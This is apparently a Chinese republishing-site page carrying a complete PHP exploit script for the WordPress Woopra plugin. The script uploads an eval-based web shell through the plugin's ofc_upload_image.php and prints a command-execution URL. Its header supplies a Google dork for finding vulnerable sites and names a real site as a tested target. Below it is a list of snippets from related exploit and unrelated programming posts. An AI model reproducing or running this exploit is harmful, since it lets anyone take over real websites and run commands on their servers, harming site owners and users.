测试方法:

提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. # Exploit Title: woopra plugins execute arbitrary PHP code Exploit
  2. # Google Dork: inurl:/plugins/woopra/inc/php-ofc-library , inurl:wp-content/plugins/woopra/inc/
  3. # Date: [06-10-2013]
  4. # Exploit Author: wantexz
  5. # Vendor Homepage:wordpress.org/plugins/woopra/
  6. # Software Link: wordpress.org/plugins/woopra
  7. # Version: woopra
  8. # Tested on: [wantexz]
  9. # CVE :
  10. # target tested: http://zainhd.com/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php
  11. ############################################################################################
  12. # INDONESIANCODER
  13. # by
  14. # WANTEXZ
  15. #
  16. ############################################################################################
  17. <?php
  18. # woopra plugins ~ Exploit
  19. # http://indonesiancoder.com/
  20. #
  21. echo <<<EOT
  22. # -----------------------------------
  23. #/ woopra ~ Exploit \
  24. #\ Author: wantexz /
  25. # -----------------------------------
  26. ################################################################################################
  27. # Author: WANTEXZ
  28. #
  29. # thank to : tukulesto,arianom,cimpli,jack_jahat,k4L0NG666,Br3NG0S,Xr0b0t,blie,KaMtiEz,Mboys
  30. # all indonesian coder, indonesian defacer, kill-9
  31. ,jatimcom , malangcyber
  32. #
  33. ################################################################################################
  34. EOT;
  35. $options = getopt('u:f:');
  36. if(!isset($options['u'], $options['f']))
  37. die("\n Usage example: php IDC.php -u http://target.com/ -f shell.php\n
  38. -u http://target.com/ The full path to Joomla!
  39. -f shell.php The name of the file to create.\n");
  40. $url = $options['u'];
  41. $file = $options['f'];
  42. $shell ="{$url}//wp-content/plugins/woopra/inc/tmp-upload-images/{$file}";
  43. $url ="{$url}/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name={$file}";
  44. $data ="<?php eval(\$_GET['cmd']); ?>";
  45. $headers = array('User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64;
  46. rv:15.0) Gecko/20100101 Firefox/15.0.1',
  47. 'Content-Type: text/plain');
  48. echo " [+] Submitting request to: {$options['u']}\n";
  49. $handle = curl_init();
  50. curl_setopt($handle, CURLOPT_URL, $url);
  51. curl_setopt($handle, CURLOPT_HTTPHEADER, $headers);
  52. curl_setopt($handle, CURLOPT_POSTFIELDS, $data);
  53. curl_setopt($handle, CURLOPT_RETURNTRANSFER,true);
  54. $source = curl_exec($handle);
  55. curl_close($handle);
  56. if(!strpos($source,'Undefined variable: HTTP_RAW_POST_DATA')&&
  57. @fopen($shell,'r'))
  58. {
  59. echo " [+] Exploit completed successfully!\n";
  60. echo " ______________________________________________\n\n
  61. {$shell}?cmd=system('id');\n";
  62. }
  63. else
  64. {
  65. die(" [+] Exploit was unsuccessful.\n");
  66. }
  67. ?>

WordPress Woopra plugin remote PHP arbitrary code execution exploit.的更多相关文章

  1. Apache / PHP 5.x Remote Code Execution Exploit

    测试方法: 本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! /* Apache Magica by Kingcope */ /* gcc apache-magika.c -o ...

  2. DayuCMS 1.525 /include/global.func.php Foreground Arbitrary Code Execution

    catalog . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 Relevant Link: http://joychou.org/in ...

  3. [EXP]Microsoft Windows CONTACT - Remote Code Execution

    [+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3 ...

  4. CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...

  5. Insecure default in Elasticsearch enables remote code execution

    Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to exe ...

  6. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  7. MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...

  8. Roundcube 1.2.2 - Remote Code Execution

    本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...

  9. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

随机推荐

  1. c语言学习之基础知识点介绍(十五):函数的指针

    一.函数的指针的介绍 /* 函数指针: 函数的指针,本质上一个指针 指向函数的指针,就是一个函数指针. 回忆:我们写的源代码编译成二进制的指令集,一串交给CPU执行的指令 先存在内存里面,然后CPU读 ...

  2. MSSQL的sysprocesses

          包含正在 SQL Server 实例上运行的进程的相关信息. 这些进程可以是客户端进程或系统进程. 若要访问 sysprocesses,您必须位于 master 数据库上下文中, 或者必须 ...

  3. 关于使用用友华表Cell控件按需打印行的方法

    分享下只需一个cll文件按需打印行的觉得最好的方式:1.cell文件要打印行的地方最好不要全删了,留一行,设置好单元格样式(字体.对齐方式.折行自适应等),后面会省一些代码: 2.使用CopyRang ...

  4. 一个fibonacci数列简单求和的问题

    前段时间老师在讲函数调用的时候,用Fibonacci数列来演示了一下,因为以前没怎么接触过Fibonacci,所以当时很懵. 当时让求的是Fibonacci数列中,第N位值为多少,当时老师写的是: 之 ...

  5. ACTIVEX 重新安装与卸载

    1.卸载工具 SREngLdr.EXE,打开后执行 系统修复->浏览器加载项,找到对应的ACTIVEX,点击删除.OK 2.开发人员如遇到ACTIVEX版本更新.可在OBJECT 里加入更高版本 ...

  6. iOS--NSNetService和NSNetServiceBrowser(Bonjour网络编程)

    Cocoa 网络框架: Cocoa 网络框架有三层,最底层的是基于 BSD socket库,然后是 Cocoa 中基于 C 的 CFNetwork,最上面一层是 Cocoa 中 Bonjour.通常我 ...

  7. 10.13_extjs,combox,效率为什么这么低

    (1)今天很累!经过三天的奋斗,终于完成了完全最优界面的快捷选址功能.今天是最后一天,最紧张,也最累. 为何我的效率不高呢?!我的时间都花费到哪儿呢?①阅读代码理解过去的逻辑:②关键技术上的再复习再巩 ...

  8. Bzoj 3831 [Poi2014]Little Bird

    3831: [Poi2014]Little Bird Time Limit: 20 Sec Memory Limit: 128 MB Submit: 310 Solved: 186 [Submit][ ...

  9. OpenJudge/Poj 1631 Bridging signals

    1.链接地址: http://poj.org/problem?id=1631 http://bailian.openjudge.cn/practice/1631 2.题目: Bridging sign ...

  10. C语言结构体中的函数指针

      这篇文章简单的叙述一下函数指针在结构体中的应用,为后面的一系列文章打下基础 本文地址:http://www.cnblogs.com/archimedes/p/function-pointer-in ...